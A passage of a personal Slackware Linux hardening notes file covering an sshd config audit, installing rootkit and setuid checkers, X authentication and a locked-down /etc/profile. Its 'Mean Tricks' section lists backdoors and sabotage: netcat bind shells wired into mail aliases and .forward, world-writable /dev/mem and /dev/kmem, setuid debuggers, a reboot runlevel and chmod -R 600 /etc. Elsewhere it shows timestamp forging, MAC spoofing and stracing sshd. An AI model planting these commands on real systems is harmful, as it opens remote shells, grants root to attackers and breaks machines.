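             "$(printf '%s' "$exp" | tr 'A-Z' 'a-z')" ]; then
            echo "MISMATCH $key: want '$exp', effective '${got:-<unset>}'"
            bad=$((bad + 1))
        fi
    done
    return $bad
}

# Usage (constructed sample): a later "PermitRootLogin yes" is ignored by sshd,
# and a directive that only appears inside a Match block is globally unset.
#   sshd_audit /etc/ssh/sshd_config "Protocol 2" "PermitRootLogin no" \
#       "PasswordAuthentication no" "X11Forwarding no" "UsePrivilegeSeparation yes"
```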
/etc/ssh/sshrc:
TODO
/usr/bin/mysqld_safe:
TODO
root@darkstar:~# less /var/lib/mysql/darkstar.err
man mysql_fix_privilege_tables
NFS:
root@darkstar:~# removepkg nfs-utils
NIS:
root@darkstar:~# removepkg yptools
----[ Security Programs/Scripts ]----
GnuPG:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/testing/packages
installpkg gnupg-1.4.2-i486-1.tgz
libsafe:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/extra/libsafe-2.0.16
installpkg libsafe-2.0.16-i386-1.tgz
Snort:
http://www.snort.org
TODO
sXid:
http://packages.debian.org/stable/source/sxid
root@darkstar:~# cp sxid_4.0.5.tar.gz src
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd sxid_4.0.5.tar.gz | tar xvf -
root@darkstar:~/src# cd sxid-4.0.5
root@darkstar:~/src/sxid-4.0.5# less README
root@darkstar:~/src/sxid-4.0.5# make install
/usr/local/etc/sxid.conf:
ALWAYS_NOTIFY = "yes"
ALWAYS_ROTATE = "yes"
IGNORE_DIRS = ""
/etc/cron.daily/sxid:
#!/bin/sh
/usr/local/bin/sxid
root@darkstar:~# chmod 700 /etc/cron.daily/sxid
root@darkstar:~# sxid
chkrootkit:
http://www.chkrootkit.org
root@darkstar:~# cp chkrootkit_0.46a.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd chkrootkit_0.46a.tar.gz | tar xvf -
root@darkstar:~/src# cd chkrootkit-0.46a
root@darkstar:~/src/chkrootkit-0.46a# less README
root@darkstar:~/src/chkrootkit-0.46a# make sense
Copy the following to /usr/local/sbin:
check_wtmpx
chkdirs
chklastlog
chkproc
chkrootkit
chkutmp
chkwtmp
ifpromisc
strings-static
root@darkstar:~# crontab -e
# Chkrootkit, results are mailed to root
10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1)
root@darkstar:~# killall -HUP crond
aide:
http://sourceforge.net/project/aide
TODO
lcap:
root@darkstar:~# cp lcap_0.0.6.orig.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf -
root@darkstar:~/src/# cd lcap-0.0.6/
root@darkstar:~/src/lcap-0.0.6# less README
root@darkstar:~/src/lcap-0.0.6# make
root@darkstar:~/src/lcap-0.0.6# strip lcap
root@darkstar:~/src/lcap-0.0.6# cp lcap /usr/local/sbin
----[ Usability/Reducing Security ]----
Run X applications as root:
The Linux Security Cookbook contains a short script that will set DISPLAY
and XAUTHORITY to allow root to run X apps. Or you can cheat by setting
DISPLAY and HOME to accomplish the same thing.
root@darkstar:~# xv
xv: Can't open display
root@darkstar:~# DISPLAY=:0.0
root@darkstar:~# xv
Xlib: connection to ":0.0" refused by server
Xlib: Invalid MIT-MAGIC-COOKIE-1 key
xv: Can't open display
root@darkstar:~# HOME=/home/dentonj
root@darkstar:~# xv
A better way is to use xauth and set the MIT-MAGIC-COOKIE:
root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \
xauth merge -
root@darkstar:~# xauth list
darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
dentonj@darkstar:~$ xauth list
darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
localhost:0 MIT-MAGIC-COOKIE-1 9876543219fedcba9876543210fedcba
You still have to set DISPLAY for root. Be aware that setting DISPLAY in a
shell config file (e.g. - /etc/profile) may cause problems with X
forwarding in ssh.
man xauth
man Xsecurity
/usr/bin/lessopen.sh:
I like to dig around inside of binaries. Uncomment the following lines:
*) FILE=`file -L "$1"` ; # Check to see if binary, if so -- view with 'strings'
FILE1=`echo $FILE | cut -d ' ' -f 2`
FILE2=`echo $FILE | cut -d ' ' -f 3`
if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \
-o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then
strings "$1"
fi ;;
Error Beep:
I make extensive use of tab completion in bash. However, the error beeps
tend to annoy those around me. Here are three ways to turn off the error
beep.
/etc/profile:
setterm -bfreq 0
~/.xinitrc:
xset -b
exec /usr/X11R6/bin/startfluxbox
/etc/inputrc:
set bell-style none
man bash
----[ Mean Tricks ]----
/etc/aliases:
opensaysme: | nc -l -p 44444 -e /bin/sh
~/.forward:
| nc -l -p 44444 -e /bin/sh
/etc/login.defs:
NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6
/etc/rc.d/rc.6:
touch /etc/forcefsck
/etc/hotplug/blacklist:
hid
/etc/inittab:
id:6:initdefault:
iptables -m random
iptables -A FORWARD -s 192.168.1.1 -m random --average 90 -j DROP
iptables -A INPUT -j DROP
Anywhere in /etc/rc.d:
reboot
enable -n enable
chmod u+s /usr/bin/strace
chmod u+s /usr/bin/gdb
chmod 666 /dev/mem
chmod 666 /dev/kmem
chmod 666 /dev/port
ifconfig eth0 mtu 68
touch ./-r
# Look mom, I'm securing my system!
chmod -R 600 /etc
----[ Useful Commands ]----
ldd /usr/bin/lppasswd
/lib/ld-linux.so.2 --list /usr/bin/lppasswd
strings /usr/bin/lppasswd
List some of the popular REM commands used.
man -k cron
grep crond /var/log/packages/*
cd /bin && for i in `ls | grep -v "@$"`; do
file $i | grep "not stripped"
done
for i in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin \
/usr/X11R6/bin; do echo $i; cd $i && for j in `ls | grep "@$"`; do file $j \
| grep "not stripped"; done; done
which kill
type -a kill
stat /bin/login
touch example
stat example
touch -r /bin/login example
stat example
strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \
-e read=6 # Where 19148 is the PID of sshd
ifconfig eth0 hw ether 00:00:DE:AD:BE:EF
ifconfig eth0 0.0.0.0 up -arp
ln -s /usr/bin/write /bin/write
kibitz dentonj
netwatch
iptraf
last -f /var/log/wtmp.1.gz
grep -ir secur /usr/doc/* > security.txt
----[ /etc/profile ]----
# Kick and lockout users that are UID 0 but are not root
if [ `id -u` = "0" -a `echo $USER` != "root" ]; then
# Lock the user out
passwd -l $USER
# Save some info
date >> /root/SHIT
netstat -peanut >> /root/SHIT
ps auxww >> /root/SHIT
w >> /root/SHIT
w | mail -s "$USER has gained ROOT access on $HOSTNAME" [email protected]
# Let EVERYONE know
wall << EOF
****************************************************************
$USER has gained ROOT access on $HOSTNAME!!!
****************************************************************
EOF
for i in `ls /dev/pts/`; do
echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> /dev/pts/$i
done
# Log it
# (logger -f would read a message FROM the named file; syslog.conf decides
# where the entry is written, so no file argument is needed here)
logger -is "$USER has gained ROOT access!!"
# Let the luzer know
echo -e "\a\n\n You are _NOT_ root!!\n\n\a"
# For the really paranoid (run before killing the user's processes)
ifconfig eth0 down
# Kill the user and their processes
skill -9 -u $USER
# This should be redundant
logout
exit
fi
export LESSOPEN="|/usr/bin/lessopen.sh %s"
# Set a default shell prompt:
#PS1='`hostname`:`pwd`#'
#if [ "$SHELL" = "/bin/pdksh" ]; then
# PS1='! $ '
#elif [ "$SHELL" = "/bin/ksh" ]; then
# PS1='! ${PWD/#$HOME/~}$ '
#elif [ "$SHELL" = "/bin/zsh" ]; then
# PS1='%n@%m:%~%# '
#elif [ "$SHELL" = "/bin/ash" ]; then
# PS1='$ '
#else
# PS1='\u@\h:\w\$ '
#fi
if [ `id -u` = 0 ]; then
# A red shell prompt for root
PS1="\[\033[1;31m\][\j][\u@\h:\w]#\[\033[0m\] "
else
# A green shell prompt for everyone else
PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] "
fi
PS2='>'
export PATH LESS TERM PS1 PS2
# For non-root users, add the current directory to the search path:
#if [ ! "`id -u`" = "0" ]; then
# PATH="$PATH:."
#fi
#
# Stuff I've added
#
# Add $HOME/bin to the search path
PATH=$PATH:$HOME/bin
export PATH
export FIGNORE=".o"
# Set EDITOR for less
export EDITOR=vim
# History
# I use to set these to paranoid settings, such as 100 or 10.
export HISTSIZE=10000
export HISTFILESIZE=10000
# Display timestamp information with each history entry
export HISTTIMEFORMAT="%F %T "
# Logout if a root terminal is not being used
if [ `id -u` = "0" ]; then
export TMOUT=1200
fi
# Aliases
alias matrix="cmatrix -bass"
alias m="cmatrix -bass"
alias su="su -"
alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump"
# shred doesn't delete recursively
# use "/bin/rm -rf ..." for directories
alias rm="shred -uz"
# Disable the bash builtin command kill, forces the use
# of /bin/kill.
# This was a cute idea, but it prevents jobs from being killed
#enable -n kill
# Misc shell settings
shopt -s cdspell
shopt -s cmdhist
shopt -s dotglob
shopt -s extglob
setterm -bfreq 0
# grep options
export GREP_OPTIONS="-n --color"
export GREP_COLOR="1;33"
# Secure less
export LESSSECURE=1
# This works for single user systems if the luzer who breaks into your
# system uses an interactive shell
# Lock out anyone who is neither root (uid 0) nor dentonj (uid 1000).
# The two tests must be joined with -a; with -o the condition is always true.
if [ `id -u` != "0" -a `id -u` != "1000" ]; then
passwd -l $USER
logout
fi
# Set these and make them read only to keep users from setting them
export HISTCONTROL=""
export HISTIGNORE=""
# Disable builtin shell commands
# TODO
# Set shell variables as read only, this should be last:
typeset -r HISTCONTROL
typeset -r HISTFILE
typeset -r HISTFILESIZE
typeset -r HISTIGNORE
typeset -r HISTNAME
typeset -r HISTSIZE
typeset -r LESSSECURE
typeset -r LOGNAME
typeset -r USER
-- When You Are Done --
Join the irc channel #slackware on irc.oftc.net and talk about everything
but Slackware.
-- Stuff that didn't work --
# If the following variables are not set, exit with an error message
: ${USER:?Who are you?}
: ${LOGNAME:?Who are you?}
: ${HOME:?The homeless need help}
# If a user doesn't have a home directory listed in /etc/passwd,
# login is nice enough to set "/" as $HOME
if [ ${HOME} = "/" ]; then
logout
fi
-- Todo --
KDE:
Look into it
/etc/shells:
Lock down the other shells.
/bin/login:
Modify so that a different password hashing algorithm is used.
Securing filesystems other than ext2 and ext3
Log checking utility
-- Resources --